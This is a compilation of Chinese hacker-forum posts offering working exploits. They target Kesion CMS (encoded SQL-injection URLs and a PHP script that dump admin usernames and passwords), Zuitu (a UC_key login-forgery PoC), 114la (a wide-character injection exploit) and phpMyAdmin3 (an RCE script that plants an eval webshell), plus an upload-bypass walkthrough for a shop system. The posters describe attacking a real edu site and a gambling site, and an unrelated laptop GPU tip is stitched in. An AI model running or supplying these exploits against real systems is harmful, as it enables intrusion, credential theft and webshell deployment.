科讯kesion 6.x - 7.06 继续利用
今天跟某黑阔搞一edu,很悲催的站长,前段时间才装的科讯6.5,现在直接被爆菊花。。。
t00ls的大牛只提供了利用方法,我爆了md5,可是解不出···mssql版的科讯,运气好的能备份shell呢,不能放弃鸟。于是,就着网上的一篇分析文,写了段php,本地搭建php+apache后,直接丢工具就可以跑了。www.t00ls.net( {! }! ~/ G, m" T) y0 ?
T00LS! h1 P: X4 D# X0 H% C5 b
<?phpSecurity: r$ D M$ `4 k3 Y% W$ u
/*
$str = "' union Select top 10 AdminID,UserName&chr(124)&PassWord From KS_Admin";
for ($i=0; $i<=strlen($str); $i++){
$temp .= "%25".base_convert(ord($str[$i]),10,16);0 H# m) ^4 @7 {- K, v
}
echo $temp."0"; - 低调求发展- g8 W1 J9 T7 X8 w3 c" V- ]8 W N. _
*/Security' b7 k, A6 b( I7 w; P" O' M
// http://www.edu.cn/user/reg/regajax.asp?action=getcityoption&province=%2566%2527%2520%256F%2572%2520%2531%253D%2531%25006 Z# G' \( ?6 L; I+ }3 }
// 所有信息Security' \2 b6 z5 x. q; t# d: f
$id = $_GET['id'];
$url = "http://www.edu.cn/user/reg/regajax.asp?action=getcityoption&province=";T00LS1 P# D0 M3 b( @) s+ N
$param = "f' or 1=1 and 1=".$id; // ?id=1
for ($i = 0; $i < strlen($param); $i ++)
{
$temp .= "%25".base_convert(ord($param[$i]),10,16);www.t00ls.net0 G. d* z8 [5 m& R5 T0 }
}
$url = $url.$temp."%2500";
//echo $url;
//echo file_get_contents($url);
echo GetSources($url);: Y) _4 x+ i9 D6 F7 }: K
Security% d: T) e; e& ^4 K6 M
function GetSources($Url,$User_Agent='',$Referer_Url='') //抓取某个指定的页面
{
//$Url 需要抓取的页面地址 - 低调求发展6 s' Y, I H x; A% h F) ]
//$User_Agent 需要返回的user_agent信息 如“baiduspider”或“googlebot”
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $Url);
curl_setopt ($ch, CURLOPT_USERAGENT, $User_Agent); - 低调求发展# d: q+ d5 H/ s: [, z
curl_setopt ($ch, CURLOPT_REFERER, $Referer_Url); - 低调求发展; x/ u8 B9 y/ d* Q( _
curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1); - 低调求发展' z# Z2 M7 d0 c! U* j. R
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);www.t00ls.net6 b+ g) W' b% H4 ]. _' I
$MySources = curl_exec ($ch);T00LS5 g$ m- ^6 D9 `/ L! M
curl_close($ch);
return $MySources;
} -
?>
自己看着修改就是了。
- 低调求发展* H$ H6 s% z/ U- u" n3 y
这里还有一个问题,php 的file_get_contents不能获取505错误的具体信息,所以不能报错注射,只能盲注,希望大牛能指点一下···Security# ]6 I* j2 C$ G5 \, o! W
! w9 Q- J: i: K' e! ]+ z1 ?
解决了···
科讯kesion 6.x - 7.06 第二枚注射漏洞
作者:goingta
网站:www.zzfhw.com
哎 那个心酸啊
还是自己找一个吧
希望没有闲言闲语
报告官方只是觉得人家做这么大怎么样都会有面子问题
要是xx非主流去给挂个黑页比较难为情
不解释了 。。。。
因为第一枚在user目录下面 很容易被一些网站把这个目录给删除了
刚好朋友今天遇到一个没有第一枚那个文件了
于是发出来给大家玩玩
科讯 6.x - 7.06 SQL 注射漏洞
作者:goingta www.t00ls.net
网站:http://www.zzfhw.com
某日逛t00ls.net的时候 看到论坛图片随机显示哪里有一张 标题为 科讯 6.x - 7.06 SQL 注射漏洞 - 低调求发展
点进去看 原来核心会员们又在xxoo
我没权限看 自然是看不了了
仔细看下图片 - 低调求发展
暴露了存在漏洞的文件名
于是自己也下一套下来看了下
刚学asp 不是很精通
后来还是成功爆出账户密码
拿去官方测试,也还存在
漏洞通知官方,已补。
不敢私藏,分享一下
非主流黑客别用来修改人家主页啊,没得前途
http://www.zzfhw.com/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500
============================================================================
author:my5t3rywww.t00ls.net! B6 F$ d9 r1 U! s0 H x a; |
转载请注明:t00ls.net
漏洞位于注册页面的\User\Reg\RegAjax.asp 中的24 - 46行 和 254 -270 行 代码如下:01 Class Ajax_Check
02 Private KS
03 Private Sub Class_Initialize()
04 Set KS=New PublicCls
05 End Sub
06 Private Sub Class_Terminate()
07 Set KS=Nothing
08 End Sub
09 Public Sub Kesion()
10
11 Select Case KS.S("Action")
12 Case "checkusername"
13 Call CheckUserName()
14 Case "checkemail"
15 Call CheckEmail()
16 Case "checkcode"
17 Call CheckCode()
18 Case "getregform"
19 Call GetRegForm()
20 Case "getcityoption"
21 Call getCityOption()
22 End Select
23 End Sub
24
25 ……略去无关代码
26
27 Sub getCityOption()
28 Dim Province,XML,Node
29 Province=UnEscape(KS.S("Province")) //注意这里
30 Dim RS:Set RS=Server.CreateObject("ADODB.RECORDSET")
31 RS.Open "Select top 200 a.ID,a.City From KS_Province a Inner Join KS_Province b On A.ParentID=B.ID Where B.City='" & Province & "' order by a.orderid,a.id",conn,1,1
32 If Not RS.Eof Then
33 Set XML=KS.RsToXml(Rs,"row","")
34 End If
35 RS.Close : Set RS=Nothing
36 If IsObject(XML) Then
37 For Each Node In XML.DocumentElement.SelectNodes("row")
38 KS.Echo "<option value=""" & node.SelectSingleNode("@city").text &""">" & node.SelectSingleNode("@city").text &"</option>"
39 Next
40 End If
41 Set XML=Nothing
42 End Sub
43 End Class
01 Class Ajax_Check
02 Private KS
03 Private Sub Class_Initialize()
04 Set KS=New PublicCls
05 End Sub
06 Private Sub Class_Terminate()
07 Set KS=Nothing
08 End Sub
09 Public Sub Kesion()
10
11 Select Case KS.S("Action")
12 Case "checkusername"
13 Call CheckUserName()
14 Case "checkemail"
15 Call CheckEmail()
16 Case "checkcode"
17 Call CheckCode()
18 Case "getregform"
19 Call GetRegForm()
20 Case "getcityoption"
21 Call getCityOption()
22 End Select
23 End Sub
24
25 ……略去无关代码
26
27 Sub getCityOption()
28 Dim Province,XML,Node
29 Province=UnEscape(KS.S("Province")) //注意这里
30 Dim RS:Set RS=Server.CreateObject("ADODB.RECORDSET")
31 RS.Open "Select top 200 a.ID,a.City From KS_Province a Inner Join KS_Province b On A.ParentID=B.ID Where B.City='" & Province & "' order by a.orderid,a.id",conn,1,1
32 If Not RS.Eof Then
33 Set XML=KS.RsToXml(Rs,"row","")
34 End If
35 RS.Close : Set RS=Nothing
36 If IsObject(XML) Then
37 For Each Node In XML.DocumentElement.SelectNodes("row")
38 KS.Echo "<option value=""" & node.SelectSingleNode("@city").text &""">" & node.SelectSingleNode("@city").text &"</option>"
39 Next
40 End If
41 Set XML=Nothing
42 End Sub
43 End Class
以上代码中的Province=UnEscape(KS.S("Province")) 调用自定义函数KS.S进行过滤,接着又调用UnEscape函数解码! - 低调求发展" Q8 @/ Z( n/ x6 H- m
- 低调求发展' R8 t! h+ Y0 C5 T
其中KS.S 函数 与UnEscape函数 原型如下:01 Function DelSql(Str)
02 Dim SplitSqlStr,SplitSqlArr,I
03 SplitSqlStr="dbcc|alter|drop|*|and |exec|or |insert|select|delete|update|count |master|truncate|declare|char|mid|chr|set |where|xp_cmdshell"
04 SplitSqlArr = Split(SplitSqlStr,"|")
05 For I=LBound(SplitSqlArr) To Ubound(SplitSqlArr)
06 If Instr(LCase(Str),SplitSqlArr(I))>0 Then
07 Die "<script>alert('系统警告!\n\n1、您提交的数据有恶意字符" & SplitSqlArr(I) &";\n2、您的数据已经被记录;\n3、您的IP:"&GetIP&";\n4、操作日期:"&Now&";\n Powered By Kesion.Com!');window.close();</script>"
08 End if
09 Next
10 DelSql = Str
11 End Function
12 '取得Request.Querystring 或 Request.Form 的值
13 Public Function S(Str)
14 S = DelSql(Replace(Replace(Request(Str), "'", ""), """", ""))
15 End Function
01 Function DelSql(Str)
02 Dim SplitSqlStr,SplitSqlArr,I
03 SplitSqlStr="dbcc|alter|drop|*|and |exec|or |insert|select|delete|update|count |master|truncate|declare|char|mid|chr|set |where|xp_cmdshell"
04 SplitSqlArr = Split(SplitSqlStr,"|")
05 For I=LBound(SplitSqlArr) To Ubound(SplitSqlArr)
06 If Instr(LCase(Str),SplitSqlArr(I))>0 Then
07 Die "<script>alert('系统警告!\n\n1、您提交的数据有恶意字符" & SplitSqlArr(I) &";\n2、您的数据已经被记录;\n3、您的IP:"&GetIP&";\n4、操作日期:"&Now&";\n Powered By Kesion.Com!');window.close();</script>"
08 End if
09 Next
10 DelSql = Str
11 End Function
12 '取得Request.Querystring 或 Request.Form 的值
13 Public Function S(Str)
14 S = DelSql(Replace(Replace(Request(Str), "'", ""), """", ""))
15 End Function
01 Function UnEscape(str)
02 Dim x
03 x=InStr(str,"%")
04 Do While x>0
05 UnEscape=UnEscape&Mid(str,1,x-1)
06 If LCase(Mid(str,x+1,1))="u" Then
07 UnEscape=UnEscape&ChrW(CLng("&H"&Mid(str,x+2,4)))
08 str=Mid(str,x+6)
09 Else
10 UnEscape=UnEscape&Chr(CLng("&H"&Mid(str,x+1,2)))
11 str=Mid(str,x+3)
12 End If
13 x=InStr(str,"%")
14 Loop
15 UnEscape=UnEscape&str
16 End Function
01 Function UnEscape(str)
02 Dim x
03 x=InStr(str,"%")
04 Do While x>0
05 UnEscape=UnEscape&Mid(str,1,x-1)
06 If LCase(Mid(str,x+1,1))="u" Then
07 UnEscape=UnEscape&ChrW(CLng("&H"&Mid(str,x+2,4)))
08 str=Mid(str,x+6)
09 Else
10 UnEscape=UnEscape&Chr(CLng("&H"&Mid(str,x+1,2)))
11 str=Mid(str,x+3)
12 End If
13 x=InStr(str,"%")
14 Loop
15 UnEscape=UnEscape&str
16 End Function
这里编码出现混乱,产生了与php的二次编码类似的漏洞,利用比较简单,可以union:
http://localhost/user/reg/regajax.asp?action=getcityoption&province=%2527%2520%2575%256e%2569%256f%256e%2520%2553%2565%256c%2565%2563%2574%2520%2574%256f%2570%2520%2531%2530%2520%2541%2564%256d%2569%256e%2549%2544%252c%2555%2573%2565%2572%254e%2561%256d%2565%2526%2563%2568%2572%2528%2531%2532%2534%2529%2526%2550%2561%2573%2573%2557%256f%2572%2564%2520%2546%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500
Security3 I! Y& Y3 Z/ K; U I
上面的利用针对ACCESS,MSSQL需要改下SQL语句:1 <?php
2 $str = "' union Select top 10 AdminID,UserName&chr(124)&PassWord From KS_Admin";
3 for ($i=0; $i<=strlen($str); $i++){
4 $temp .= "%25".base_convert(ord($str[$i]),10,16);
5 }
6 echo $temp."0";
7 ?>
1 <?php
2 $str = "' union Select top 10 AdminID,UserName&chr(124)&PassWord From KS_Admin";
3 for ($i=0; $i<=strlen($str); $i++){
4 $temp .= "%25".base_convert(ord($str[$i]),10,16);
5 }
6 echo $temp."0";
7 ?>
修改' union Select top 10 AdminID,UserName&chr(124)&PassWord From KS_Admin为相应的SQL语句即可。(MSSQL直接备份差异比较方便)
因为解码的时候进行了CLng类型转换,提交字符可以使其报错从而爆出物理路径 - 低调求发展9 @# p( E" u% a3 l
爆物理路径:http://localhost/user/reg/regajax.asp?action=getcityoption&province=%25i
东西压了一年了 现在很多人都有了 听说前两天还有个黑客因为搞这个被河蟹了。。
- - 默哀 看看就好了。。
Security5 ]% ]% j2 H2 X* W! R4 B3 y s$ {
第一个是上传漏洞 此漏洞在6月份出的新版本中已经得到修复 - 低调求发展! }7 O: B0 _* W$ F: Z) a
最土自己写了upload_image上传函数 本身挺安全的Security4 o$ w1 l2 G! e: J2 X( d
但是upload.php没有用这个函数www.t00ls.net8 s- g, y& d# N h
第25行
$upext='txt,rar,zip,jpg,jpeg,gif,png,swf,wmv,avi,wma,mp3,mid';
复制代码
第65行
$fileinfo=pathinfo($upfile['name']);
$extension=strtolower($fileinfo['extension']);
if(preg_match('/'.str_replace(',','|',$upext).'/i',$extension))
{
$filesize=$upfile['size'];
if($filesize > $maxattachsize)$err='文件大小超过'.$maxattachsize.'字节';
else
{
$year = date('Y');
$day = date('md');
$n = time().rand(1000,9999).'.jpg';
$attach_dir = IMG_ROOT . "/team/{$year}/{$day}";
RecursiveMkdir( IMG_ROOT . "/team/{$year}/{$day}" );
$fname= time().rand(1000,9999).'.'.$extension;
$target = $attach_dir.'/'.$fname;
if ( is_resource($upfile['tmp_name']) ) {
$data = fread($upfile['tmp_name'], $filesize);
file_put_contents($target, $data);
fclose($upfile['tmp_name']);
复制代码
//正则匹配用户提交文件的后缀 只要包含白名单就OKwww.t00ls.net {) T- t. [8 ~
最后保存的文件后缀是以用户提交为准而不是$n 利用iis6文件解析的特性 导致漏洞产生
- 低调求发展. ~6 N2 K3 x3 j# y
第二个是UC_key未初始化漏洞 此类漏洞在很多小程序里都有www.t00ls.net5 L. f9 |) Y/ d8 n( }
由于UCkey未初始化导致访问者可以随意调用uc接口的各种函数
其中包括自动登陆 修改密码
这里给个任意用户登陆的POC
<?php
print_r('
---------------------------------------
Zuitu UC_key Uninitialized Vul Exploit
By xZL
Team: www.0kee.com
2010.10.01
---------------------------------------
');
if ($argc < 2) {
print_r('
Usage: php '.$argv[0].' username
username: the admin username
Example: php '.$argv[0].' admin
');
die();
}
error_reporting(0);
$username = $argv[1];
$key = '';
$code = 'time=11111111111&username='.$username.'&action=synlogin';
$x = urlencode(authcode($code, "ENCODE", $key));
print_r('Plz copy this code~~ enjoy it~~ ^_^
/api/uc.php?code='.$x);
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
$ckey_length = 4;
$key = md5($key ? $key : UC_KEY);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);
$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);
$result = '';
$box = range(0, 255);
$rndkey = array();
for($i = 0; $i <= 255; $i++) {
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
}
for($j = $i = 0; $i < 256; $i++) {
$j = ($j + $box[$i] + $rndkey[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
for($a = $j = $i = 0; $i < $string_length; $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}
if($operation == 'DECODE') {
if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
return substr($result, 26);
} else {
return '';
}
} else {
return $keyc.str_replace('=', '', base64_encode($result));
}
}
?>
114啦网址导航留言本注入
漏洞文件 feedback/feedback.php
影响版本 <=1.5
$username = empty($_POST['username']) ? '' : strip_tags(iconv('UTF-8', 'GBK', $_POST['username']));
$email = (isset($_POST['email'])) ? strip_tags(iconv('UTF-8', 'GBK', $_POST['email'])) : '';
$content = (isset($_POST['content'])) ? trim(iconv('UTF-8', 'GBK', $_POST['content'])) : '';
(empty($content)) && $error_msg .= ',意见及建议 ';
if (!empty($error_msg))
{
throw new Exception($error_msg, 11);
}
$content = htmlspecialchars($content, ENT_QUOTES);
if (strlen($content) > 600 || strlen($content) < 40)
{
throw new Exception('请将您的描述控制在 20 - 300 字,更多内容请您分次提交。', 1);
}
// 验证次数
$old_cookie = (isset($_COOKIE['fdnum'])) ? (int)$_COOKIE['fdnum'] : 0;
if ($old_cookie >= SUBMIT_ONE_DAY)
{
throw new Exception('抱歉,24 小时内您只能提交 ' . SUBMIT_ONE_DAY . ' 次反馈信息。谢谢合作!', 2);
}
$old_cookie++;
if (false === app_db::insert('ylmf_feedback', array('username', 'email', 'content', 'add_time'),
array($username, $email, $content, time())))
{
throw new Exception('抱歉,信息提交失败,请重试。', 1);
}
else
{
// 记录提交次数
if ($old_cookie > SUBMIT_ONE_DAY || !isset($_COOKIE['fdstime']) || $_COOKIE['fdstime'] < 1)
{
setcookie('dfstime', time(), time() + 86400);
setcookie('fdnum', $old_cookie, time() + 86400);
}
else
{
setcookie('fdnum', $old_cookie, time() + 86400 - (time() - $_COOKIE['fdstime']));
}
throw new Exception('<div class="success">提交成功,感谢您的反馈! <a href="'. URL .'/">返回首页</a></div>', 3);
unset($username, $email, $content);
}
复制代码
$username、$email、$content强制转换GBK编码但是均未过滤直接insert 构造UTF8宽字符形成宽字符注入 - 低调求发展( \ s& v1 u: u0 f0 r
EXP
<?php
$sbcopyright='
----------------------------------------
114la feedback injection Vul Exploit
By xZL
Team: www.0kee.com
2011.04.02
Usage: php '.$argv[0].' host /path
Example: php '.$argv[0].' 127.0.0.1 /
----------------------------------------
';
if ($argc < 3) {
print_r($sbcopyright);
die();
}
ob_start();
$url = $argv[1];
$path= $argv[2];
$sock = fsockopen("$url", 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");
$data = "username=0kee%E7%B8%97'&email=,0,(select%201%20from%20(select%20count(*),concat((SELECT%20concat(name,0x5f,password)%20FROM%20ylmf_admin_user limit 0,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2)#&content=~~~~~this is a test from 0kee security team~~~~~";
fwrite($sock, "POST $path/feedback/feedback.php HTTP/1.1\r\n");
fwrite($sock, "Accept: */*\r\n");
fwrite($sock, "Referer: http://$url/#M\r\n");
fwrite($sock, "Accept-Language: zh-cn\r\n");
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
fwrite($sock, "User-Agent: Mozilla\r\n");
fwrite($sock, "Host: $url\r\n");
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");
fwrite($sock, "Connection: Keep-Alive\r\n");
fwrite($sock, "Cache-Control: no-cache\r\n");
fwrite($sock, "Cookie:ASPSESSIONIDASDRRBRA=MFILAMMAENMDGAPJLLKPEAON\r\n\r\n");
fwrite($sock, $data);
$headers = "";
while ($str = trim(fgets($sock, 4096)))
$headers .= "$str\n";
echo "\n";
$body = "";
while (!feof($sock))
$body .= fgets($sock, 4096);
fclose($sock);
if (strpos($body, 'Duplicate entry') !== false) {
preg_match('/Duplicate entry \'(.*)1\'/', $body, $arr);
$result=explode("_",$arr[1]);
print_r("Exploit Success! \nusername:".$result[0]."\npassword:".$result[1]."\nGood Luck!");
}else{
print_r("Exploit Failed! \n");
}
ob_end_flush();
?>
K40AB、K50AB以及K70AB全系列AMD产品都支持ATI PowerXpress显卡动态切换技术
K40AB、K50AB以及K70AB全系列AMD产品都支持ATI PowerXpress显卡动态切换技术:
1. 外接电源时,启用高性能GPU模式,当前激活显卡为HD 4570独立显卡;
2. 使用电池时,切换至省电GPU模式,当前激活显卡为HD 3200集成显卡;
ATI PowerXpress只有在Vista操作系统中才能实现,在系统默认设置下只需拔/插电源即可实现显卡切换,切换时无需重启系统;
3. 如果用户必须要安装XP操作系统,则需要在安装系统之前,进入BIOS设置中的Advanced Settings,找到VGA Mode SELECT,把选项改为dGpu Mode,
保存设置重启后,被系统识别的显卡就只有HD 4570独立显卡,XP下可顺利安装驱动;
-Power Xpress mode, 即支持HD 3200与HD 4570自动切换模式
-dGpu mode,即独立显卡模式,系统默认只识别HD 4570独显
今天装一asus机子 遇到了这个问题 用这个方法解决了
phpMyAdmin3 remote code execute php版本 exploit
来源:http://www.oldjun.com/blog/index.php/archives/81/
最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
一是session.auto_start = 1;
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
于是写了这个php版本的exp,代码如下:
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');
/**
* working when the directory:"config" exists and is writeable.
**/
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
exit;
}
$host = $argv[1];
$path = $argv[2];
/**
* Try to determine if the directory:"config" exists
**/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr=php_request('config/');
if(strpos($returnstr,'404')){
exit("[-] Exploit Failed! The directory:config do not exists!\n");
}
/**
* Try to get token and sessionid
**/
echo "[+] Try to get token and sessionid....\n";
$result=php_request('index.php');
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token=$resp[3];
$sessionid=$resp[1];
if($token && $sessionid){
echo "[+] token:$token\n";
echo "[+] Session ID:$sessionid\n";
}else{
exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}
/**
* Try to insert shell into session
**/
echo "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
/**
* Try to create webshell
**/
echo "[+] Try to create webshell....\n";
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
/**
* Try to check if the webshell was created successfully
**/
echo "[+] Try to check if the webshell was created successfully....\n";
$content=php_request('config/config.inc.php');
if(strpos($content,'t00ls')){
echo "[+] Congratulations! Expoilt successfully....\n";
echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
}else{
exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}
function php_request($url,$data='',$cookie=''){
global $host, $path;
$method=$data?'POST':'GET';
$packet = $method." ".$path.$url." HTTP/1.1\r\n";
$packet .= "Accept: */*\r\n";
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$packet .= "Host: $host\r\n";
$packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
$packet .= $cookie?"Cookie: $cookie\r\n":"";
$packet .= "Connection: Close\r\n\r\n";
$packet .= $data?$data:"";
$fp = fsockopen(gethostbyname($host), 80);
if (!$fp) {
echo 'No response from '.$host; die;
}
fputs($fp, $packet);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
?> 分享网络商城购物系统v3.0全功能版 上传漏洞
首发地址:www.3est.com
Author:村长
BLOG:www.baidu.com
拿赌博站时,遇到的充值地址在这个程序的站点上,所以就去下载了份,略过看注入点,直接看上传地方.
文件u_sc1.asp源码:
- <!--#include file="../include/yiwebchina.asp"-->
- <%
- session("fuptype")=request("fuptype") '此处先接受fuptype,存入session("fuptype") ,下一个文件需要利用
- session("fupname")=request("fupname") '此处先接受fupname,存入session("fupname") ,下一个文件需要利用
- session("frmname")=request("frmname")
- /*省略代码*/
- <form name="form1" method="post" action="u_sc1save.asp" enctype="multipart/form-data">
- <b>请选择要上传的文件:</b><br>
- <input type=file name="file1">
- <input type=submit name="submit" value="上传"><br><br>
- ·点击“上传”后,请耐心等待(不要重复点击“上传”),上传时间视文件大小和网络状况而定<br>
- ·为节省空间,如果是图片文件,请尽量优化,建议单个文件不要超过50KB。<br>
- ·传送大文件时,可能导致服务器变慢或者不稳定。建议使用FTP上传大文件。
- </form>
文件u_sc1save.asp源码
- <!--#include file="../include/yiwebchina.asp"-->
- <html>
- <head>
- <title>文件上传</title>
- <meta name="Description" Content="">
- <LINK href="../images/css.css" type=text/css rel=stylesheet>
- <LINK href="../list/newhead.css" type=text/css rel=stylesheet>
- <meta http-equiv="Content-Type" content="text/html; charset=gb2312"></head>
- <body bgcolor="#D9EAFC"><table align="left"><tr><td>
- <%
- fuptype=session("fuptype") '利用点1
- fupname=session("fupname") '利用点2
- frmname=session("frmname")
- if fuptype="" or fupname="" or frmname="" then
- response.write "<script language='javascript'>"
- response.write "alert('出现错误,请重新上传!');"
- response.write "location.href='javascript:history.go(-1)';"
- response.write "</script>"
- response.end
- end if
- %>
- <!--#include FILE="upload_5xsoft.inc"-->
- <%
- set upload=new upload_5xsoft
- set file=upload.file("file1")
- if file.fileSize>0 then
- filename=fupname+"." '此处属于利用点2,直接把URL里的fupname值改为1.asa;,原因很多人懂滴
- filenameend=file.filename
- filenameend=split(filenameend,".")
- n=UBound(filenameend)
- filename=filename&filenameend(n)
- if fuptype<>"db" then
- if file.fileSize>200000 then
- response.write "<script language='javascript'>"
- response.write "alert('您上传的文件太大,上传不成功,单个文件最大不能超过200K!');"
- response.write "location.href='javascript:history.go(-1)';"
- response.write "</script>"
- response.end
- end if
- end if
- if fuptype="adv" or fuptype="pic" then '问题也在这里出现了,当fuptype=adv或者fuptype=pic时才判断后缀
- if LCase(filenameend(n))<>"gif" and LCase(filenameend(n))<>"jpg" and LCase(filenameend(n))<>"swf" and LCase(filenameend(n))<>"htm" then
- response.write "<script language='javascript'>"
- response.write "alert('不允许上传您选择的文件格式,请检查后重新上传!');"
- response.write "location.href='javascript:history.go(-1)';"
- response.write "</script>"
- response.end
- end if
- end if
- if fuptype="adv" then '此处利用点1,接下来是判断fuptype值了,ADV和PIC不能利用,乱填的话,上传后不会返回路径,所以可以利用的只有pic1,link,db了随便选择一个就行了
- savepath="../images/adv/"&filename
- elseif fuptype="pic" then
- savepath="../pic/digi/"&filename
- elseif fuptype="pic1" then
- savepath="../pic/digi1/"&filename
- elseif fuptype="link" then
- savepath="../images/links/"&filename
- elseif fuptype="db" then
- savepath="./"&filename
- end if
- file.saveAs Server.mappath(savepath)
- response.write "文件上传成功!上传文件的物理路径为:"
- response.write "<font color=red>"&Server.mappath(savepath)&"</font><br><br>"
- response.write "<a href='"&savepath&"' target='_blank'>点击预览上传的文件</a>"
- response.write "<br><br><INPUT onclick='javascript:window.close();' type=submit value='上传完成'>"
- %>
此文件所涉及的3个文件yiwebchina.asp,buyok.asp,functions.asp都米有验证ADMIN,所以直接利用吧
漏洞利用1:
http://www.baidu.com/admin/u_sc1 ... c&fupname=1.asa;&frmname=youpic (上传SHELL的图片格式)
漏洞利用2:
http://www.baidu.com/admin/u_sc1 ... &frmname=youpic (随便上传)
http://www.baidu.com/admin/u_sc1 ... &frmname=youpic (随便上传)
http://www.baidu.com/admin/u_sc1 ... &frmname=youpic (随便上传)
都注意SHELL文件不要超过限制200K(除开第四条DB上传外)
原理也很简单,也是给想学习自己找ODAY的菜菜详细的分析,呵呵
